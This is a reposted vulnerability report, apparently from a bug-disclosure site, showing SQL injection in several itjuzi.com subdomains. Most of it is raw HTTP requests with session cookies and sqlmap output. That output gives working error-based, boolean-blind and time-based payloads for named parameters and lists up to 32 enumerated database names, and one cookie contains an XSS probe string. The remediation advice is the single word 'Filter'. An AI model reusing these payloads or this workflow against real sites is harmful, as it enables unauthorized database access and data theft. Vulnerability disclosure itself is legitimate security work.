IT orange multi-site SQL injection 4 (involving a large number of databases)

Source: Internet
Author: User
Tags redmine

IT orange multi-site SQL injection 4 (involving a large number of databases)



[HD] building network security with personal glory in the name of a team

 

1.

Data Packets:


 

GET /investevents?scope=1&similar_money=2&sub_scope=75 HTTP/1.1Cookie: cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2218155777735a8bba07cf79b317c7c235%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22218.205.17.171%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435637740%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Deea558e5acc865deaf8a977cb17317b2; BAIDU_DUP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\">
 
  ()refdxss"); Hm_lvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; Hm_lpvt_1c587ad486cdb6b962e94fc2002edf89=1435637252; _ga=GA1.2.1933942160.1435637253; _gat=1; bd_st=%28%7B%22s%22%3A1435637277874%2C%22r%22%3A%22http%3A//tmp.itjuzi.com/search%3Fcat%3Dcompany%26keyword%3D1%22%7D%29Host: tmp.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
 





The scope parameter and sub_scope parameter can be injected. Here we use scope injection for demonstration.


 




 





Read the permission


 





So many database influences a lot.
 

GET parameter 'scope' is vulnerable. Do you want to keep testing the others (ifany)? [y/N] nsqlmap identified the following injection points with a total of 1730 HTTP(s) requests:---Parameter: scope (GET)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: scope=1) AND (SELECT 8906 FROM(SELECT COUNT(*),CONCAT(0x7176767871,(SELECT (ELT(8906=8906,1))),0x71706b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (7451=7451&similar_money=2&sub_scope=75    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (comment)    Payload: scope=1) AND SLEEP(5)#&similar_money=2&sub_scope=75---[12:48:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[12:48:14] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 7web application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0[12:48:14] [INFO] fetching database names[12:48:14] [INFO] the SQL query used returns 32 entries[12:48:14] [INFO] starting 10 threads[12:48:15] [INFO] retrieved: information_schema[12:48:15] [INFO] retrieved: apple_cn[12:48:15] [INFO] retrieved: apple[12:48:15] [INFO] retrieved: bdxzjklt[12:48:15] [INFO] retrieved: avgouzai[12:48:15] [INFO] retrieved: blog_chktips[12:48:15] [INFO] retrieved: dear_there[12:48:15] [INFO] retrieved: blogitjuzi[12:48:15] [INFO] retrieved: cciehunhun[12:48:15] [INFO] retrieved: dengta[12:48:15] [INFO] retrieved: demo_chktips[12:48:15] [INFO] retrieved: dev_yahoo[12:48:15] [INFO] retrieved: itjuzi[12:48:15] [INFO] retrieved: letcodefly[12:48:15] [INFO] retrieved: itjuzidemo[12:48:16] [INFO] retrieved: kejiju[12:48:16] [INFO] retrieved: kids_db[12:48:16] [INFO] retrieved: meximexi[12:48:16] [INFO] retrieved: psdhere[12:48:16] [INFO] retrieved: mysql[12:48:16] [INFO] retrieved: seeker[12:48:16] [INFO] retrieved: redmine[12:48:16] [INFO] retrieved: sochips[12:48:16] [INFO] retrieved: seeker_test[12:48:16] [INFO] retrieved: ssmli[12:48:16] [INFO] retrieved: spider_article[12:48:16] [INFO] retrieved: test[12:48:16] [INFO] retrieved: wp_new[12:48:16] [INFO] retrieved: zangels[12:48:16] [INFO] retrieved: touzishuju[12:48:18] [INFO] retrieved: wp_new_2[12:48:19] [INFO] retrieved: chktipsavailable databases [32]:[*] apple[*] apple_cn[*] avgouzai[*] bdxzjklt[*] blog_chktips[*] blogitjuzi[*] cciehunhun[*] chktips[*] dear_there[*] demo_chktips[*] dengta[*] dev_yahoo[*] information_schema[*] itjuzi[*] itjuzidemo[*] kejiju[*] kids_db[*] letcodefly[*] meximexi[*] mysql[*] psdhere[*] redmine[*] seeker[*] seeker_test[*] sochips[*] spider_article[*] ssmli[*] test[*] touzishuju[*] wp_new[*] wp_new_2[*] zangels[12:48:20] [WARNING] HTTP error codes detected during run:400 (Bad Request) - 2 times, 500 (Internal Server Error) - 1757 times[12:48:20] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'



2. Data Packets:


 

GET /invstdeal?prov=1&round=9&similar_money=1 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://car.itjuzi.com:80/Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6Host: car.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*





Prov parameter Injection


 




 




 

GET parameter 'prov' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 880 HTTP(s) requests:---Parameter: prov (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: prov=1'||(SELECT 'vyVA' FROM DUAL WHERE 1321=1321 RLIKE (SELECT (CASE WHEN (1420=1420) THEN 1 ELSE 0x28 END)))||'&round=9&similar_money=1---[13:00:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[13:00:23] [INFO] testing MySQL[13:00:24] [INFO] confirming MySQL[13:00:25] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.6.9back-end DBMS: MySQL >= 5.0.0[13:00:25] [INFO] fetching database names[13:00:25] [INFO] fetching number of databases[13:00:25] [INFO] retrieved: 7[13:00:27] [INFO] retrieving the length of query output[13:00:27] [INFO] retrieved: 18[13:01:22] [INFO] retrieved: information_schema[13:01:22] [INFO] retrieving the length of query output[13:01:22] [INFO] retrieved: 10[13:01:38] [INFO] retrieved: _logitjuzi 9/10 (90%)[13:01:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request[13:02:16] [INFO] retrieved: @logitjuzi[13:02:16] [INFO] retrieving the length of query output[13:02:16] [INFO] retrieved: 10[13:02:34] [INFO] retrieved: cacti_prod[13:02:34] [INFO] retrieving the length of query output[13:02:34] [INFO] retrieved: 6[13:02:56] [INFO] retrieved: itjuzi[13:02:56] [INFO] retrieving the length of query output[13:02:56] [INFO] retrieved: 5[13:03:12] [INFO] retrieved: mysql[13:03:12] [INFO] retrieving the length of query output[13:03:12] [INFO] retrieved: 4[13:03:22] [INFO] retrieved: test[13:03:22] [INFO] retrieving the length of query output[13:03:22] [INFO] retrieved: 10[13:03:41] [INFO] retrieved: touzishujuavailable databases [7]:[*] @logitjuzi[*] cacti_prod[*] information_schema[*] itjuzi[*] mysql[*] test[*] touzishuju[13:03:41] [WARNING] HTTP error codes detected during run:400 (Bad Request) - 1 times, 500 (Internal Server Error) - 675 times[13:03:41] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\car.itjuzi.com'

 

 

3. Data Packets:


 

GET /news?time=-1&type=13 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://car.itjuzi.com:80/Cookie: csrf_cookie_name=8dd969eebfb7bcca1c2ef373d9d77f31; cisession=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2202d64eb824a52f46b03dab17073af0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%2236.250.86.185%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435636782%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Da2768b740c73761818bea540c8499ad6Host: car.itjuzi.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*





The time parameter can be injected.


 





I will not go into depth here.


 

GET parameter 'time' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 100 HTTP(s) requests:---Parameter: time (GET)    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: time=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))WGpt) AND 'tAGM'='tAGM&type=13---[13:11:23] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.6.9back-end DBMS: MySQL 5.0.12[13:11:23] [INFO] fetching database names[13:11:23] [INFO] fetching number of databases[13:11:23] [INFO] retrieved:[13:11:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y7[13:11:47] [INFO] retrieved:[13:11:57] [INFO] adjusting time delay to 4 seconds due to good response timesinformatio



4. URL: http://tmp.itjuzi.com: 80/location? Fund_status = 6 & id =-1 & type = com



Parameter id can be injected (32 database root permissions)


 




 




 

 

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* (URI)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT 9081 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(9081=9081,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dfwk21=6 AND 000507=000507 --    Type: AND/OR time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)    Payload: http://tmp.itjuzi.com:80/location?id=-1" OR 3 AND (SELECT * FROM (SELECT(SLEEP(5)))lLua)-- zpXx21=6 AND 000507=000507 -----[13:16:10] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.13, Nginxback-end DBMS: MySQL 5.0[13:16:10] [INFO] fetching database names[13:16:10] [WARNING] reflective value(s) found and filtering out[13:16:10] [INFO] the SQL query used returns 32 entries[13:16:11] [INFO] retrieved: information_schema[13:16:11] [INFO] retrieved: apple[13:16:11] [INFO] retrieved: apple_cn[13:16:12] [INFO] retrieved: avgouzai[13:16:12] [INFO] retrieved: bdxzjklt[13:16:13] [INFO] retrieved: blog_chktips[13:16:13] [INFO] retrieved: blogitjuzi[13:16:13] [INFO] retrieved: cciehunhun[13:16:14] [INFO] retrieved: chktips[13:16:14] [INFO] retrieved: dear_there[13:16:14] [INFO] retrieved: demo_chktips[13:16:15] [INFO] retrieved: dengta[13:16:15] [INFO] retrieved: dev_yahoo[13:16:15] [INFO] retrieved: itjuzi[13:16:16] [INFO] retrieved: itjuzidemo[13:16:16] [INFO] retrieved: kejiju[13:16:16] [INFO] retrieved: kids_db[13:16:17] [INFO] retrieved: letcodefly[13:16:17] [INFO] retrieved: meximexi[13:16:18] [INFO] retrieved: mysql[13:16:18] [INFO] retrieved: psdhere[13:16:18] [INFO] retrieved: redmine[13:16:19] [INFO] retrieved: seeker[13:16:19] [INFO] retrieved: seeker_test[13:16:19] [INFO] retrieved: sochips[13:16:20] [INFO] retrieved: spider_article[13:16:20] [INFO] retrieved: ssmli[13:16:21] [INFO] retrieved: test[13:16:21] [INFO] retrieved: touzishuju[13:16:21] [INFO] retrieved: wp_new[13:16:22] [INFO] retrieved: wp_new_2[13:16:22] [INFO] retrieved: zangelsavailable databases [32]:[*] apple[*] apple_cn[*] avgouzai[*] bdxzjklt[*] blog_chktips[*] blogitjuzi[*] cciehunhun[*] chktips[*] dear_there[*] demo_chktips[*] dengta[*] dev_yahoo[*] information_schema[*] itjuzi[*] itjuzidemo[*] kejiju[*] kids_db[*] letcodefly[*] meximexi[*] mysql[*] psdhere[*] redmine[*] seeker[*] seeker_test[*] sochips[*] spider_article[*] ssmli[*] test[*] touzishuju[*] wp_new[*] wp_new_2[*] zangels[13:16:22] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 35 times[13:16:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\tmp.itjuzi.com'


 

Solution:

Filter

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.